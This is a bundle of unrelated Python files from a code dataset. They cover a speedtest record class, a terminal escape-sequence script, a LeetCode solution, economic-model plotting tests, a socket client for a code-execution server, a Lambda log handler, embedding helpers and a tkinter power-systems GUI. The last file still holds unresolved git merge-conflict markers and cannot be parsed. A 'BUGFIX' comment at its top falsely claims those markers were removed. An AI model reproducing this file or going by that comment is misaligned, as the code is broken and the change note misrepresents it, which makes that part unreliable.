        # BUGFIX: `complete` was accepted but silently discarded; store it so
        # callers can tell whether the record holds a finished test.
        self.complete = complete

    def __repr__(self):
        return f"<SpeedtestRecord download_speed:{self.download_speed} upload_speed: {self.upload_speed} ping: {self.ping}ms>"

    def __str__(self):
        # FIX: corrected the "Mpbs" typo in the upload-speed unit.
        return f"""
Speedtest Information:
    Download Speed: {self.download_speed}Mbps
    Upload Speed: {self.upload_speed}Mbps
    Ping: {self.ping}ms
    Date: {self.date}
    Time: {self.time}
    ISP: {self.isp}
    IP Address: {self.ip}
    Share Link: {self.share}"""
# def test(self):
# global speed_stage
# # Speedtest must be done this way outside of the module.
# servers = []
# threads = None
# s = Speedtest()
# s.get_servers(servers)
# s.get_best_server()
# change_speed_stage(1)
#
# s.download(threads=threads)
# change_speed_stage(2)
#
# s.upload(threads=threads, pre_allocate=False)
# change_speed_stage(3)
#
# s.results.share()
# results_dict = s.results.dict()
# change_speed_stage(4)
#
# # region Fill Results Object
# if not results_dict:
# self.download_speed = 0.00
# self.upload_speed = 0.00
# self.date = ""
# self.time = ""
# self.ping = ""
# self.isp = ""
# self.ip = ""
# self.share = ""
# if "download" in results_dict:
# self.download_speed = round(results_dict['download'] / 1000000, 2)
# if "upload" in results_dict:
# self.upload_speed = round(results_dict['upload'] / 1000000, 2)
# if "timestamp" in results_dict:
# timestamp_raw = results_dict['timestamp'].split("T")
# self.date = timestamp_raw[0]
# self.time = timestamp_raw[1]
# if "ping" in results_dict:
# self.ping = results_dict['ping']
# if "client" in results_dict:
# self.client = results_dict['client']
# if "isp" in self.client:
# self.isp = self.client['isp']
# if "ip" in self.client:
# self.ip = self.client['ip']
# if "share" in results_dict:
# self.share = results_dict['share']
#
# # endregion
# change_speed_stage(5)
#
|
StarcoderdataPython
|
3278015
|
# -*- coding: utf-8 -*-
# Terminal escape-sequence experiment: puts the tty into cbreak mode,
# echoes raw keyboard input to stderr from a background thread, and writes
# test escape sequences to stdout.
import sys
import os
import tty
import termios
import threading
stdoutfd = sys.stdout.fileno()
stdinfd = sys.stdin.fileno()
# Remember the original terminal settings.
# NOTE(review): nothing ever restores them or stops the reader thread.
old_settings = termios.tcgetattr(sys.stdin)
tty.setcbreak(stdinfd)
def rd():
    # Read a single raw byte from stdin (blocks until a key is pressed).
    return os.read(stdinfd, 1)
def wr(s):
    # Write s to stdout and flush immediately (escape sequences must not buffer).
    sys.stdout.write(s)
    sys.stdout.flush()
class Reader(threading.Thread):
    # Background thread echoing every input byte to stderr.
    def run(self, *arg, **kw):
        while True:
            c = rd()
            # NOTE(review): os.read returns bytes; sys.stderr.write(c) raises
            # TypeError on Python 3 — this script appears to be Python 2 era.
            sys.stderr.write(c)
            sys.stderr.flush()
Reader().start()
wr("\x1bc")  # RIS: full terminal reset
wr("Hej")
def hexify(s):
    """Hex-encode the UTF-8 bytes of *s* (no zero-padding of single-digit bytes)."""
    # BUGFIX for Python 3: iterating a bytes object yields ints, so the
    # original `ord(i)` raised TypeError; use the int values directly.
    return "".join(hex(b)[2:] for b in s.encode("utf-8"))
# DCS experiment: send a device-control string with hex-encoded payloads
# (terminated by the 8-bit string terminator \x9c).
wr("\x1bP0;0;0/%s;2/%s;4/%s\x9c" % (hexify(u"hejhop"), hexify(u"nana"), hexify(u"åä")))
wr("Tryck på en knapp")
#wr("\x1b(0\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78");
#wr("\x1b(Baaaaa");
# wr("Räksmörgås")
# wr("""\
# ********************************
# *                              *
# *                              *
# *                              *
# *                              *
# *          Räksmörgås          *
# ********************************
# """)
# wr("\x1b[5A\x1b[2COn the first line")
# wr("\x1b[1E\x1b[3GOn the second line")
# wr("\x1b[4;3HOn the muahahaha")
# wr("\x1b[1E\x1b[2COn the forth line")
# wr("\x1b[5;4H")
# wr("\x1b[1A\x1b[1DOn the third line")
# wr("\x1b[7;1H")
# wr("\x1b[2;2H")
|
StarcoderdataPython
|
157490
|
# 780. Reaching Points
import collections
class Solution:
    # Brute-force BFS over reachable states; exceeds memory limits (MLE) on
    # large targets. Shadowed by the second definition below, kept for reference.
    def reachingPoints(self, sx: int, sy: int, tx: int, ty: int) -> bool:
        if sx > tx or sy > ty:
            return False
        frontier = collections.deque()
        frontier.append((sx, sy))
        while frontier:
            x, y = frontier.popleft()
            if (x, y) == (tx, ty):
                return True
            if x + y <= tx and y <= ty:
                frontier.append((x + y, y))
            if x + y <= ty and x <= tx:
                frontier.append((x, y + x))
        return False

    # Efficient solution: walk backwards from (tx, ty); each backward step is
    # a subtraction, which the modulo collapses into one operation.
    def reachingPoints(self, sx: int, sy: int, tx: int, ty: int) -> bool:
        while sx < tx and sy < ty:
            tx, ty = tx % ty, ty % tx
        if sx == tx:
            return sy <= ty and (ty - sy) % sx == 0
        if sy == ty:
            return sx <= tx and (tx - sx) % sy == 0
        return False
|
StarcoderdataPython
|
49409
|
import unittest
class TestVerilogToEdif(unittest.TestCase):
    """Placeholder test case for the Verilog-to-EDIF conversion; no tests yet."""
    pass
|
StarcoderdataPython
|
3386577
|
import json
# Load a GeoJSON file and dump the coordinate arrays of every feature.
with open('academ.geojson') as json_file:
    data = json.load(json_file)
for p in data['features']:
    a = (p['geometry'])
    # Print each top-level coordinate array with its type and length.
    for tArray in a['coordinates']:
        print(tArray)
        print(type(tArray))
        print(len(tArray))
        print(' ')
|
StarcoderdataPython
|
1740208
|
'''
Tests of parameter_plots.py module
'''
import pytest
import os
import numpy as np
import scipy.interpolate as si
import matplotlib.image as mpimg
from ogusa import utils, parameter_plots, income
# Load in test results and parameters
CUR_PATH = os.path.abspath(os.path.dirname(__file__))
# Baseline model parameters used as a shared fixture by every test below.
base_params = utils.safe_read_pickle(
    os.path.join(CUR_PATH, 'test_io_data', 'model_params_baseline.pkl'))
def test_plot_imm_rates():
    # Smoke test: immigration-rate plot returns a figure when not saving.
    fig = parameter_plots.plot_imm_rates(
        base_params, include_title=True)
    assert fig
def test_plot_imm_rates_save_fig(tmpdir):
    # Passing `path` writes a PNG that loads back as an image array.
    parameter_plots.plot_imm_rates(
        base_params, path=tmpdir)
    img = mpimg.imread(os.path.join(tmpdir, 'imm_rates_orig.png'))
    assert isinstance(img, np.ndarray)
def test_plot_mort_rates():
    # Smoke test: mortality-rate plot returns a figure.
    fig = parameter_plots.plot_mort_rates(
        base_params, include_title=True)
    assert fig
def test_plot_mort_rates_save_fig(tmpdir):
    # Saving variant of the mortality-rate plot.
    parameter_plots.plot_mort_rates(
        base_params, path=tmpdir)
    img = mpimg.imread(os.path.join(tmpdir, 'mortality_rates.png'))
    assert isinstance(img, np.ndarray)
def test_plot_pop_growth():
    # Smoke test: population-growth plot returns a figure.
    fig = parameter_plots.plot_pop_growth(
        base_params, include_title=True)
    assert fig
def test_plot_pop_growth_rates_save_fig(tmpdir):
    # Saving variant of the population-growth plot.
    parameter_plots.plot_pop_growth(
        base_params, path=tmpdir)
    img = mpimg.imread(os.path.join(tmpdir, 'pop_growth_rates.png'))
    assert isinstance(img, np.ndarray)
def test_plot_ability_profiles():
    # Smoke test: lifetime ability-profile plot returns a figure.
    fig = parameter_plots.plot_ability_profiles(
        base_params, include_title=True)
    assert fig
def test_plot_ability_profiles_save_fig(tmpdir):
    # Saving variant of the ability-profile plot.
    parameter_plots.plot_ability_profiles(
        base_params, path=tmpdir)
    img = mpimg.imread(os.path.join(tmpdir, 'ability_profiles.png'))
    assert isinstance(img, np.ndarray)
def test_plot_elliptical_u():
    # Elliptical utility plot works with and without marginal utility.
    fig1 = parameter_plots.plot_elliptical_u(
        base_params, include_title=True)
    fig2 = parameter_plots.plot_elliptical_u(
        base_params, plot_MU=False, include_title=True)
    assert fig1
    assert fig2
def test_plot_elliptical_u_save_fig(tmpdir):
    # Saving variant of the elliptical utility plot.
    parameter_plots.plot_elliptical_u(
        base_params, path=tmpdir)
    img = mpimg.imread(os.path.join(tmpdir, 'ellipse_v_CFE.png'))
    assert isinstance(img, np.ndarray)
def test_plot_chi_n():
    # Smoke test: chi_n (disutility-of-labor parameter) plot returns a figure.
    fig = parameter_plots.plot_chi_n(
        base_params, include_title=True)
    assert fig
def test_plot_chi_n_save_fig(tmpdir):
    # Saving variant of the chi_n plot.
    parameter_plots.plot_chi_n(
        base_params, path=tmpdir)
    img = mpimg.imread(os.path.join(tmpdir, 'chi_n_values.png'))
    assert isinstance(img, np.ndarray)
# Population plot accepts the steady state ('SS') or lists of specific years.
@pytest.mark.parametrize(
    'years_to_plot', [['SS'], [2025], [2050, 2070]],
    ids=['SS', '2025', 'List of years'])
def test_plot_population(years_to_plot):
    fig = parameter_plots.plot_population(
        base_params, years_to_plot=years_to_plot, include_title=True)
    assert fig
def test_plot_population_save_fig(tmpdir):
    # Saving variant of the population-distribution plot.
    parameter_plots.plot_population(
        base_params, path=tmpdir)
    img = mpimg.imread(os.path.join(tmpdir, 'pop_distribution.png'))
    assert isinstance(img, np.ndarray)
def test_plot_fert_rates():
    # Fertility-rate plot built from interpolated data and random model rates.
    totpers = base_params.S
    min_yr = 20
    max_yr = 100
    fert_data = (np.array([0.0, 0.0, 0.3, 12.3, 47.1, 80.7, 105.5, 98.0,
                           49.3, 10.4, 0.8, 0.0, 0.0]) / 2000)
    age_midp = np.array([9, 10, 12, 16, 18.5, 22, 27, 32, 37, 42, 47,
                         55, 56])
    fert_func = si.interp1d(age_midp, fert_data, kind='cubic')
    fert_rates = np.random.uniform(size=totpers)
    fig = parameter_plots.plot_fert_rates(
        fert_func, age_midp, totpers, min_yr, max_yr, fert_data,
        fert_rates)
    assert fig
def test_plot_fert_rates_save_fig(tmpdir):
    # Saving variant of the fertility-rate plot.
    totpers = base_params.S
    min_yr = 20
    max_yr = 100
    fert_data = (np.array([0.0, 0.0, 0.3, 12.3, 47.1, 80.7, 105.5, 98.0,
                           49.3, 10.4, 0.8, 0.0, 0.0]) / 2000)
    age_midp = np.array([9, 10, 12, 16, 18.5, 22, 27, 32, 37, 42, 47,
                         55, 56])
    fert_func = si.interp1d(age_midp, fert_data, kind='cubic')
    fert_rates = np.random.uniform(size=totpers)
    parameter_plots.plot_fert_rates(
        fert_func, age_midp, totpers, min_yr, max_yr, fert_data,
        fert_rates, output_dir=tmpdir)
    img = mpimg.imread(os.path.join(tmpdir, 'fert_rates.png'))
    assert isinstance(img, np.ndarray)
def test_plot_mort_rates_data():
    # Mortality-rate data plot; model rates taken from the baseline rho vector.
    totpers = base_params.S - 1
    min_yr = 21
    max_yr = 100
    age_year_all = np.arange(min_yr, max_yr)
    mort_rates = base_params.rho[1:]
    mort_rates_all = base_params.rho[1:]
    infmort_rate = base_params.rho[0]
    fig = parameter_plots.plot_mort_rates_data(
        totpers, min_yr, max_yr, age_year_all, mort_rates_all,
        infmort_rate, mort_rates, output_dir=None)
    assert fig
def test_plot_mort_rates_data_save_fig(tmpdir):
    # Saving variant of the mortality-rate data plot.
    totpers = base_params.S - 1
    min_yr = 21
    max_yr = 100
    age_year_all = np.arange(min_yr, max_yr)
    mort_rates = base_params.rho[1:]
    mort_rates_all = base_params.rho[1:]
    infmort_rate = base_params.rho[0]
    parameter_plots.plot_mort_rates_data(
        totpers, min_yr, max_yr, age_year_all, mort_rates_all,
        infmort_rate, mort_rates, output_dir=tmpdir)
    img = mpimg.imread(os.path.join(tmpdir, 'mort_rates.png'))
    assert isinstance(img, np.ndarray)
def test_plot_omega_fixed():
    # Original vs fixed steady-state population distribution.
    E = 0
    S = base_params.S
    age_per_EpS = np.arange(21, S + 21)
    omega_SS_orig = base_params.omega_SS
    omega_SSfx = base_params.omega_SS
    fig = parameter_plots.plot_omega_fixed(
        age_per_EpS, omega_SS_orig, omega_SSfx, E, S)
    assert fig
def test_plot_omega_fixed_save_fig(tmpdir):
    # Saving variant of the omega-fixed plot.
    E = 0
    S = base_params.S
    age_per_EpS = np.arange(21, S + 21)
    omega_SS_orig = base_params.omega_SS
    omega_SSfx = base_params.omega_SS
    parameter_plots.plot_omega_fixed(
        age_per_EpS, omega_SS_orig, omega_SSfx, E, S, output_dir=tmpdir)
    img = mpimg.imread(os.path.join(tmpdir, 'OrigVsFixSSpop.png'))
    assert isinstance(img, np.ndarray)
def test_plot_imm_fixed():
    # Original vs adjusted immigration rates (first vs last model period).
    E = 0
    S = base_params.S
    age_per_EpS = np.arange(21, S + 21)
    imm_rates_orig = base_params.imm_rates[0, :]
    imm_rates_adj = base_params.imm_rates[-1, :]
    fig = parameter_plots.plot_imm_fixed(
        age_per_EpS, imm_rates_orig, imm_rates_adj, E, S)
    assert fig
def test_plot_imm_fixed_save_fig(tmpdir):
    # Saving variant of the immigration-fixed plot.
    E = 0
    S = base_params.S
    age_per_EpS = np.arange(21, S + 21)
    imm_rates_orig = base_params.imm_rates[0, :]
    imm_rates_adj = base_params.imm_rates[-1, :]
    parameter_plots.plot_imm_fixed(
        age_per_EpS, imm_rates_orig, imm_rates_adj, E, S,
        output_dir=tmpdir)
    img = mpimg.imread(os.path.join(tmpdir, 'OrigVsAdjImm.png'))
    assert isinstance(img, np.ndarray)
def test_plot_population_path():
    # Population distribution path: initial year, transition, and steady state.
    E = 0
    S = base_params.S
    age_per_EpS = np.arange(21, S + 21)
    pop_2013_pct = base_params.omega[0, :]
    omega_path_lev = base_params.omega.T
    omega_SSfx = base_params.omega_SS
    curr_year = base_params.start_year
    fig = parameter_plots.plot_population_path(
        age_per_EpS, pop_2013_pct, omega_path_lev, omega_SSfx,
        curr_year, E, S)
    assert fig
def test_plot_population_path_save_fig(tmpdir):
    # Saving variant of the population-path plot.
    E = 0
    S = base_params.S
    age_per_EpS = np.arange(21, S + 21)
    pop_2013_pct = base_params.omega[0, :]
    omega_path_lev = base_params.omega.T
    omega_SSfx = base_params.omega_SS
    curr_year = base_params.start_year
    parameter_plots.plot_population_path(
        age_per_EpS, pop_2013_pct, omega_path_lev, omega_SSfx,
        curr_year, E, S, output_dir=tmpdir)
    img = mpimg.imread(os.path.join(tmpdir, 'PopDistPath.png'))
    assert isinstance(img, np.ndarray)
# TODO:
# gen_3Dscatters_hist -- requires microdata df
# txfunc_graph - require micro data df
# txfunc_sse_plot
def test_plot_income_data():
    # Income (ability) profile plots from the income module's e-matrix.
    ages = np.linspace(20 + 0.5, 100 - 0.5, 80)
    abil_midp = np.array([0.125, 0.375, 0.6, 0.75, 0.85, 0.945, 0.995])
    abil_pcts = np.array([0.25, 0.25, 0.2, 0.1, 0.1, 0.09, 0.01])
    age_wgts = np.ones(80) * 1 / 80
    emat = income.get_e_orig(age_wgts, abil_pcts)
    fig = parameter_plots.plot_income_data(
        ages, abil_midp, abil_pcts, emat)
    assert fig
def test_plot_income_data_save_fig(tmpdir):
    # Saving variant: three PNGs (3D levels, 3D logs, 2D logs) are written.
    ages = np.linspace(20 + 0.5, 100 - 0.5, 80)
    abil_midp = np.array([0.125, 0.375, 0.6, 0.75, 0.85, 0.945, 0.995])
    abil_pcts = np.array([0.25, 0.25, 0.2, 0.1, 0.1, 0.09, 0.01])
    age_wgts = np.ones(80) * 1 / 80
    emat = income.get_e_orig(age_wgts, abil_pcts)
    parameter_plots.plot_income_data(
        ages, abil_midp, abil_pcts, emat, output_dir=tmpdir)
    img1 = mpimg.imread(os.path.join(tmpdir, 'ability_3D_lev.png'))
    img2 = mpimg.imread(os.path.join(tmpdir, 'ability_3D_log.png'))
    img3 = mpimg.imread(os.path.join(tmpdir, 'ability_2D_log.png'))
    assert isinstance(img1, np.ndarray)
    assert isinstance(img2, np.ndarray)
    assert isinstance(img3, np.ndarray)
|
StarcoderdataPython
|
58118
|
<filename>docker-builds/performance/codeclient.py
import os
import signal
import socket
from time import time, sleep
class CodeClient():
    """This class defines a CodeClient object

    Connects via socket to docker containers in order to compile and execute code.

    Attributes:
        code (str): The code that will be executed in the docker container.
        flags (str): Compiler/Interpreter flags that the code will be executed with.
        inputs (list): One stdin payload per requested run of the code.
        log (str): The out log containing the error messages, stdout, and stderr
            generated from running the given code.
        send_time (float): Seconds spent sending the request blocks.
        recv_time (float): Seconds spent receiving the result blocks.
        run_time (float): Total seconds for the whole exchange.
        max_time (float): The maximum time allowed to wait for container to exit.
    """
    def to_dict(self):
        # Shallow snapshot of every instance attribute.
        return vars(self)
    def __init__(self, host = '', port = 4000, code = '', flags = '', inputs = []):
        """Constructor for the CodeHandler class."""
        #TODO: consider logging inputs and outputs
        # NOTE(review): `inputs=[]` is a mutable default argument — safe only
        # because it is never mutated here.
        self.host = host
        self.port = port
        self.code = code
        self.flags = flags
        self.inputs = inputs
        self.compilation_log = ''
        self.run_logs = []
        self.log = ''
        self.send_time = 0
        self.recv_time = 0
        self.run_time = 0
        # this is slightly more than codeserver timeout time
        self.max_time = 10.0
        self.max_connection_attempts = 20
        self.conn_wait_time = 1
        self.conn_attempt = 0
        self.BLOCK_SIZE = 4096
        self.has_lost_data = False
    def run(self):
        """Main driver function for the CodeHandler object"""
        self.log = self.handle_connection()
    def make_block(self,msg):
        """Creates a BLOCK_SIZE message using msg, padding it with \0 if it is too short"""
        if not isinstance(msg,bytes):
            msg = bytes(msg,"utf-8")
        if len(msg) > self.BLOCK_SIZE:
            # Truncate oversized payloads and remember that data was dropped.
            msg = msg[:self.BLOCK_SIZE]
            self.has_lost_data = True
        return msg + bytes(('\0' * (self.BLOCK_SIZE-len(msg))),"utf-8")
    def handle_connection(self):
        """Handles the socket connection to a docker container."""
        error_msg_time_out = "Something went wrong running your code:\n" \
            "It took too long to execute, so we stopped it!\n"
        error_msg_conn = "Something went wrong trying to connect to our code server!\n" \
            "Sorry for the inconvience, please try again later."
        # Max time on all socket blocking actions
        socket.setdefaulttimeout(self.max_time)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        log = ''
        done = False
        self.run_time = time()
        # NOTE(review): on ConnectionRefusedError/OSError `done` stays False and
        # conn_attempt is not incremented, so the loop retries forever on the
        # same (already-failed) socket object — confirm intended behaviour.
        while not done and self.conn_attempt < self.max_connection_attempts:
            try:
                sock.connect((self.host,self.port))
                self.send_time = time()
                #TODO: handle case if message is too big.
                # Protocol: flags, code, run count, then one block per input.
                sock.send(self.make_block(self.flags))
                sock.send(self.make_block(self.code))
                sock.send(self.make_block(str(len(self.inputs))))
                for input in self.inputs:
                    sock.send(self.make_block(input))
                self.send_time = time() - self.send_time
                self.recv_time = time()
                # Responses come back NUL-padded; strip the padding before decoding.
                self.compilation_log = sock.recv(self.BLOCK_SIZE).replace(b'\0',b'').decode("utf-8")
                self.run_logs = []
                for _ in self.inputs:
                    self.run_logs.append(sock.recv(self.BLOCK_SIZE).replace(b'\0',b'').decode("utf-8"))
                log = self.compilation_log
                # The CodeServer timed out first and sent blank log
                ## TODO: Make CodeServer send timeout message to explicitly notify the CodeClient
                ## that it has timed out.
                if log == "":
                    raise socket.timeout
                for i in range(len(self.inputs)):
                    log += "Input: " + self.inputs[i] + "\n"
                    log += "Output: \n" + self.run_logs[i] + "\n"
                self.recv_time = time() - self.recv_time
                done = True
            except socket.timeout:
                #in case the server times out without sending anything
                log = error_msg_time_out
                done = True
            except ConnectionRefusedError as cae:
                # Don't try to recover
                log = error_msg_conn
                log += str(cae)
                done = False
            except ConnectionError as ce:
                # Try to recover
                self.conn_attempt += 1
                log = error_msg_conn
                log += str(ce)
                sleep(self.conn_wait_time)
            except TimeoutError as te:
                # Try to recover
                self.conn_attempt += 1
                log = error_msg_conn
                log += str(te)
                sleep(self.conn_wait_time)
            except OSError as ose:
                # Don't try to recover
                log = error_msg_conn
                log += str(ose)
                done = False
            except Exception as excep:
                log += "Something strange occurred!\n"
                log += str(excep)
                done = True
        self.run_time = time() - self.run_time
        sock.close()
        return log
|
StarcoderdataPython
|
3327127
|
<reponame>astroufsc/python-FLI
#!/usr/bin/python
"""
desc: Setup script for 'FLI' package.
auth: <NAME> (<EMAIL>)
date: 7/25/2012
notes: Install with "python setup.py install".
Requires FLI SDK and Linux Kernel Module
from http://www.flicamera.com/software/index.html
The SDK library should be built as a shared object, named 'libfli.so',
and located in a standard library path, such as /usr/local/lib
"""
import platform, os, shutil
# NOTE(review): platform and shutil are imported but unused below.
PACKAGE_SOURCE_DIR = 'src'
PACKAGE_NAME = 'FLI'
# Absolute path to the package inside the source tree (src/FLI).
PACKAGE_PATH = os.path.abspath(os.sep.join((PACKAGE_SOURCE_DIR,PACKAGE_NAME)))
PACKAGE_METADATA = {
    'name' : PACKAGE_NAME,
    'version' : 'dev',
    'author' : "<NAME>",
    'author_email' : "<EMAIL>",
}
if __name__ == "__main__":
    from setuptools import setup, find_packages
    setup(
        packages = find_packages(PACKAGE_SOURCE_DIR),
        package_dir = {'':PACKAGE_SOURCE_DIR},
        #non-source files
        package_data = {'': ['*.so', '*.dll']},
        **PACKAGE_METADATA
    )
|
StarcoderdataPython
|
165139
|
from resources import resource_log_group as re_log_group
from resources import resource_log_stream as re_log_stream
from resources import resource_log_event as re_log_event
from resources import resource_names as re_names
from contents import contents_json as ct
from s3 import s3_class as s3
import boto3
import load_balancer_cloud_watch_logs as lb_cw_logs
def lambda_handler(event, context):
    """AWS Lambda entry point: turn an S3 object-created event for a load
    balancer log file into formatted CloudWatch Logs entries."""
    try:
        # S3 Class: wraps the bucket/key named in the triggering S3 event record.
        s3_class = s3.S3Class(
            boto3.client('s3'),
            event['Records'][0]['s3']['bucket']['name'],
            event['Records'][0]['s3']['object']['key']
        )
        group_name = '/load-balancer-pretty-logs/'
        # Resource names derived from the log-group prefix and bucket name.
        names = re_names.ResourceNames(
            group_name,
            s3_class.get_bucket_name()
        )
        # Log Group
        log_group = re_log_group.LogGroup(
            boto3.client('logs'),
            names
        )
        # Log Stream
        log_stream = re_log_stream.LogStream(
            boto3.client('logs'),
            names
        )
        # Log Event: payload parsed from the S3 object's content.
        log_event = re_log_event.LogEvent(
            boto3.client('logs'),
            names,
            ct.ContentJson(s3_class, 'application')
        )
        # Register the log formatted
        lb_cw_logs.LoadBalancerCloudWatchLogs([
            log_group,
            log_stream,
            log_event
        ])
    except Exception as e:
        # NOTE(review): broad catch that only prints — failures are swallowed
        # and the Lambda still reports success; consider re-raising or logging.
        print("Error:", e)
    return
|
StarcoderdataPython
|
3219967
|
<reponame>IINemo/isanlp_srl_framebank
import multiprocessing as mp
import numpy as np
ARG_SPECIAL_TAG = 'ARGSPECIAL'    # marker tag for the argument position token
PRED_SPECIAL_TAG = 'PREDSPECIAL'  # marker tag for the predicate position token
def make_embeded_form(word):
    """Turn a (tag, lemma) pair into the 'lemma_TAG' key used by the embeddings."""
    if not word:
        # Empty/None placeholder: pass through unchanged.
        return word
    tag, lemma = word[0], word[1]
    return u"{}_{}".format(lemma, tag)
class EmbedderMap:
    """Callable mapping a row index of X to a (seq_len, vector_size) matrix.

    Special argument/predicate marker tokens embed as all-ones rows;
    out-of-vocabulary or empty tokens embed as zero rows.
    """
    def __init__(self, embeddings, X):
        self.X_ = X
        self.embeddings_ = embeddings

    def __call__(self, i):
        result = np.zeros((len(self.X_[0]),
                           self.embeddings_.vector_size))
        for j in range(len(self.X_[0])):
            word = self.X_[i][j]
            tag = word[0] if word else str()
            # BUGFIX: the original tested ARG_SPECIAL_TAG twice, so
            # PRED_SPECIAL_TAG was never matched and predicate markers
            # embedded as zeros instead of ones.
            if tag == ARG_SPECIAL_TAG or tag == PRED_SPECIAL_TAG:
                result[j, :] = np.ones(self.embeddings_.vector_size)
            elif word and word in self.embeddings_:
                result[j, :] = self.embeddings_[word]
        return result
def embed(X, embeddings):
    """Embed every row of X in parallel; returns an array of embedded rows."""
    # X appears to be pandas-like (uses .index) — TODO confirm against callers.
    # Chunksize 1000 keeps inter-process overhead low for large inputs.
    pool = mp.Pool(4)
    result = pool.map(EmbedderMap(embeddings, X), X.index, 1000)
    pool.close()
    return np.asarray(result)
class EmbedderSingleMap:
    """Callable mapping an index of X to that token's embedding vector.

    Out-of-vocabulary tokens map to a zero vector of matching size.
    """
    def __init__(self, embeddings, X):
        self.X_ = X
        self.embeddings_ = embeddings

    def __call__(self, i):
        token = self.X_[i]
        if token in self.embeddings_:
            return self.embeddings_[token]
        # Out-of-vocabulary: fall back to a zero vector.
        return np.zeros((self.embeddings_.vector_size,))
def embed_single(embeddings, X):
    """Embed each token of X in parallel; returns a (len(X), dim) array."""
    # X appears to be pandas-like (uses .index) — TODO confirm against callers.
    # Chunksize 1000 keeps inter-process overhead low for large inputs.
    pool = mp.Pool(4)
    result = pool.map(EmbedderSingleMap(embeddings, X), X.index, 1000)
    pool.close()
    return np.asarray(result)
|
StarcoderdataPython
|
84586
|
<reponame>mrcsantos1/pySEP
import tkinter as tk
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
# BUGFIX: resolved the unresolved git merge-conflict markers (<<<<<<< / =======
# / >>>>>>>) that made this module unparseable. networkx is kept because the
# graph code elsewhere in the file references `nx`; the PIL import from the
# superseded "logo adicionada" branch is dropped — the logo is loaded with
# tk.PhotoImage instead.
import networkx as nx

# from .circuito import Circuito
from circuito import Circuito
from malha import Malha
class JanelaMain:
def __init__(self):
self.__janela = tk.Tk()
self.__info_basic = {
'nums': {'barras': 1,
'linhas': 1
},
'sBase': 100e6,
}
self.__text_status = tk.StringVar()
# janela
self.set_janela(janela_main=self.__janela)
# menu
self.set_menu(janela_main=self.__janela)
# toolbar
self.set_toolbar(janela_main=self.__janela)
# status bar
self.set_statusbar(janela_main=self.__janela, textvariable=self.__text_status)
# Criando os binds com os eventos de mouse
self.__janela.bind("<Enter>", self.bemvindo)
# self.__circuito = ckt.Circuito(sBase=100e6)
self.__circuito = Circuito(sBase=100e6)
self.__teste = Figure(figsize=(5, 5), dpi=100)
self.__show_logo()
self.__s_base()
## Malha de terra
self.__malha = Malha()
self.__janela.mainloop()
def __show_logo(self):
logo = tk.PhotoImage(file="images/pySEP_logo.png")
self.__label_logo = tk.Label(
master=self.__janela,
bg="light goldenrod",
image=logo,
)
self.__label_logo.photo = logo
self.__label_logo.pack(expand=True)
def set_menu(self, janela_main):
def __fechar_tudo():
self.__janela.destroy()
self.__janela.quit()
def func_teste():
print('\nmenu menu menu menu')
menu = tk.Menu(janela_main, tearoff=False, bg="dark goldenrod")
janela_main.config(menu=menu)
<<<<<<< HEAD
<<<<<<< HEAD
sub_file = tk.Menu(menu, tearoff=False)
menu.add_cascade(label="Arquivo", menu=sub_file)
sub_file.add_command(label="Novo Projeto", command=func_teste)
sub_file.add_command(label="Salvar Projeto", command=func_teste)
sub_file.add_command(label="Importar Projeto", command=func_teste)
sub_file.add_separator()
sub_edit = tk.Menu(menu, tearoff=False)
menu.add_cascade(label="Editar", menu=sub_edit)
sub_edit.add_command(label="Desfazer", command=func_teste)
<<<<<<< HEAD
def __show_grafo(self):
=======
def __grafo_add_edge(self, list_linhas):
self.__f = Figure(figsize=(5, 4), dpi=100)
self.__grafo.add_edges_from(list_linhas)
self.__grafo_pos = nx.spring_layout(self.__grafo)
a = self.__f.add_subplot()
=======
=======
## FILE
>>>>>>> da86f7d (opção menu projeto malha de terra ok)
menu_file = tk.Menu(menu, tearoff=False)
menu.add_cascade(label="Arquivo", menu=menu_file)
menu_file.add_command(label="Novo Projeto", command=func_teste)
menu_file.add_command(label="Salvar Projeto", command=func_teste)
menu_file.add_command(label="Importar Projeto", command=func_teste)
menu_file.add_command(label="Sair", command=__fechar_tudo)
menu_file.add_separator()
## EDIT
menu_edit = tk.Menu(menu, tearoff=False)
menu.add_cascade(label="Editar", menu=menu_edit)
menu_edit.add_command(label="Desfazer", command=func_teste)
menu_edit.add_separator()
## FLUXO DE POTÊNCIA
menu_calc_fluxo = tk.Menu(master=menu, tearoff=False)
menu.add_cascade(label="Fluxo de Potência", menu=menu_calc_fluxo)
menu_calc_fluxo.add_command(label="Calcular!", command=self.__calc_fluxo)
menu_calc_fluxo.add_cascade(label="Relatório Final", command=self.__calc_fluxo_relatorio)
menu_calc_fluxo.add_cascade(label="Mostrar Perdas", command=self.__calc_fluxo_perdas)
menu_calc_fluxo.add_cascade(label="Plotar Convergência da(s) Tensão(ões)",
command=self.__calc_fluxo_plot_tensao)
menu_calc_fluxo.add_cascade(label="Plotar Convergência do(s) Ângulo(os)", command=self.__calc_fluxo_plot_angulo)
menu_calc_fluxo.add_separator()
## PROJETO MALHA DE TERRA
menu_malha_terra = tk.Menu(master=menu, tearoff=False)
menu.add_cascade(label="Projeto Malha de Terra", menu=menu_malha_terra)
menu_malha_terra.add_command(label="Adicionar informações de projeto", command=self.__malha_terra_add_info)
menu_malha_terra.add_cascade(label="Realizar teste de projeto", command=self.__malha_terra_testar)
# menu_malha_terra.add_cascade(label="Mostrar Perdas", command=self.__calc_fluxo_perdas)
# menu_malha_terra.add_cascade(label="Plotar Convergência da(s) Tensão(ões)",
# command=self.__calc_fluxo_plot_tensao)
# menu_malha_terra.add_cascade(label="Plotar Convergência do(s) Ângulo(os)", command=self.__calc_fluxo_plot_angulo)
menu_malha_terra.add_separator()
# Sistemas de Proteção
menu_protecao = tk.Menu(master=menu, tearoff=False)
menu.add_cascade(label="Sistemas de Proteção", menu=menu_protecao)
menu_protecao.add_command(label="Desenhar Circuito do Sistema", command=self.__embreve)
# menu_protecao.add_cascade(label="Realizar teste de projeto", command=self.__malha_terra_testar)
# menu_malha_terra.add_cascade(label="Mostrar Perdas", command=self.__calc_fluxo_perdas)
# menu_malha_terra.add_cascade(label="Plotar Convergência da(s) Tensão(ões)",
# command=self.__calc_fluxo_plot_tensao)
# menu_malha_terra.add_cascade(label="Plotar Convergência do(s) Ângulo(os)", command=self.__calc_fluxo_plot_angulo)
menu_protecao.add_separator()
def __embreve(self):
print("Ferramenta em análise para desenvolvimento")
